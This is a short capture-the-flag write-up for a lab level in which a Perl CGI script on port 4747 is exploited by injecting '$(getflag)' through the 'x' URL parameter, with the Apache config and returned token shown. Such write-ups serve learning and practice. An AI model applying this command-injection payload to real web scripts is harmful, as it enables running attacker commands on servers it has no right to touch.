Only one file - link in the home directory - Perl script `level04.pl` which lays inside
`/var/www/level04` directory.

After few hours of familiarizing with Perl, I figure out that this file is running on the HTTP server on 4747 port.

Server configuration file lays in `/etc/apache2/sites-enabled`
```
<VirtualHost *:4747>
        DocumentRoot    /var/www/level04/
        SuexecUserGroup flag04 level04
        <Directory /var/www/level04>
                Options +ExecCGI
                DirectoryIndex level04.pl
                AllowOverride None
                Order allow,deny
                Allow from all
                AddHandler cgi-script .pl
        </Directory>
</VirtualHost>
```


So just open my browser on machine IP with port 4747.
Command: `http://192.168.56.101:4747/level04.pl?x=$(getflag)`  
Output: `Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap`  
Flag: `ne2searoevaevoem4ov4ar8ap`